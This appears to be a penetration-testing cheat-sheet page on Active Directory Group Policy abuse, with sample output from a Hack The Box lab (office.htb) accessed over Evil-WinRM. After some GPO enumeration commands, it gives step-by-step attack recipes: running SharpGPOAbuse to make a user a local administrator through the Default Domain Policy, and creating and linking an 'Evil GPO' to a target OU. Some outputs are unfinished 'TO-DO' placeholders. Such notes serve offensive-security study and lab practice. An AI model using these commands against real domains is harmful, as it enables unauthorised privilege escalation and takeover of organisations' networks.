Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
General
1. Install GPMC [Optional]
# Runas Administrator
Install-WindowsFeature GPMC
Sample Output:
PS C:\Windows\system32> Install-WindowsFeature GPMC
Install-WindowsFeature GPMC
Success Restart Needed Exit Code Feature Result
------- -------------- --------- --------------
True No Success {Group Policy Management}
2. List GPOs Name
# List all GPOs
Get-GPO -All | Select-Object DisplayName
Sample Output:
*Evil-WinRM* PS C:\Users\HHogan\Documents> Get-GPO -All | Select-Object DisplayName
DisplayName
-----------
Windows Firewall GPO
Default Domain Policy
Default Active Directory Settings GPO
Default Domain Controllers Policy
Windows Update GPO
Windows Update Domain Policy
Software Installation GPO
Password Policy GPO
# Check GPO by name
Get-GPO -Name '<GPO_NAME>'
Sample Output:
TO-DO# Generate XML report
Get-GPOReport -Name '<GPO_NAME>' -ReportType XML
Sample Output:
TO-DO# Generate pretty HTML report
Get-GPOReport -Name '<GPO_NAME>' -ReportType HTML -Path "C:\ProgramData\GPOReport.html"
Sample Output:
TO-DOAbuse #1: Add local admin
1. Add localAdmin
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount '<USER>' --GPOName '<GPO_NAME>'
Sample Output:
*Evil-WinRM* PS C:\Users\HHogan\Documents> .\SharpGPOAbuse.exe --AddLocalADmin --UserAccount 'HHogan' --GPOName 'Default Domain Policy'
[+] Domain = office.htb
[+] Domain Controller = DC.office.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=office,DC=htb
[+] SID Value of HHogan = S-1-5-21-1199398058-4196589450-691661856-1108
[+] GUID of "Default Domain Policy" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] File exists: \\office.htb\SysVol\office.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] The GPO does not specify any group memberships.
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
2. Force reload
gpupdate /force
Sample Output:
*Evil-WinRM* PS C:\Users\HHogan\Documents> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.
*Evil-WinRM* PS C:\Users\HHogan\Documents> net user HHogan
User name HHogan
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/6/2023 11:59:34 AM
Password expires Never
Password changeable 5/7/2023 11:59:34 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 5/10/2023 5:30:58 AM
Logon hours allowed All
Local Group Memberships *Administrators *Remote Management Use
Global Group memberships *Domain Users *GPO Managers
The command completed successfully.
Ref: SharpGPOAbuse
Abuse #2: WriteGPLink
1. Create a New GPO
New-GPO -Name "Evil GPO"
Sample Output:
TO-DO2. Link to Target
Get-GPO -Name "Evil GPO" | New-GPLink -Target "OU=<TARGET>,DC=<DOMAIN>,DC=<COM>"
Sample Output:
TO-DO3. Add localAdmin
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount '<USER>' --GPOName 'Evil GPO'
Sample Output:
TO-DO4. Force reload
gpupdate /force
Sample Output:
TO-DO5. Check
net user '<USER>'
Sample Output:
TO-DO